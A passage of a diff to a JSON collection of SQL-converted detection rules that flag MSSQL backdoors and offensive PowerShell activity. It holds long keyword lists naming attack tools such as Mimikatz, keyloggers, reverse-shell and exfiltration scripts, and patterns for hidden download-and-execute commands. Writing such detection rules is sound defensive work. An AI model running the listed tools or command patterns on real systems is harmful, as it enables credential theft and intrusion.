LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%New-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' 
ESCAPE '\\'))" ], - "filename": "win_mssql_disable_audit_settings.yml" + "filename": "posh_pm_malicious_commandlets.yml" }, { - "title": "MSSQL Add Account To Sysadmin Role", - "id": "08200f85-2678-463e-9c32-88dce2f073d1", + "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", + "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "status": "experimental", - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" ], - "filename": "win_mssql_add_sysadmin_account.yml" + "filename": "posh_pm_invoke_obfuscation_stdin.yml" }, { - "title": "MSSQL Extended Stored Procedure Backdoor Maggie", - "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", - "status": "experimental", - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", - "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "title": "Bad Opsec Powershell Code Artifacts", + "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "status": "test", + "description": "focuses on trivial 
artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "author": "ok @securonix invrep_de, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate extended stored procedures named maggie" + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" ], - "filename": "win_mssql_sp_maggie.yml" + "filename": "posh_pm_bad_opsec_artifacts.yml" }, { - "title": "MSSQL XPCmdshell Suspicious Execution", - "id": "7f103213-a04e-4d59-8261-213dddf22314", + "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", + "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object 
System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "win_mssql_xp_cmdshell_audit_log.yml" + "filename": "posh_pm_susp_invocation_specific.yml" }, { - "title": "MSSQL SPProcoption Set", - "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "title": "Malicious PowerShell Scripts - PoshModule", + "id": "41025fd7-0466-4650-a813-574aaacbe7f4", "status": "experimental", - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.persistence" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the feature by administrators (rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' 
ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE 
'\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' 
OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' 
ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE 
'\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR 
ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" ], - "filename": "win_mssql_sp_procoption_set.yml" + "filename": "posh_pm_exploit_scripts.yml" }, { - "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", - "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", + "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "status": "experimental", - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other MSI packages for which your admins have used that name" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "win_vul_cve_2021_41379.yml" + "filename": "posh_pm_invoke_obfuscation_via_var.yml" }, { - "title": "Microsoft Malware Protection Engine Crash", - "id": "6c82cf5c-090d-4d57-9188-533577631108", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", + "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "status": "experimental", - "description": "This rule detects a suspicious crash 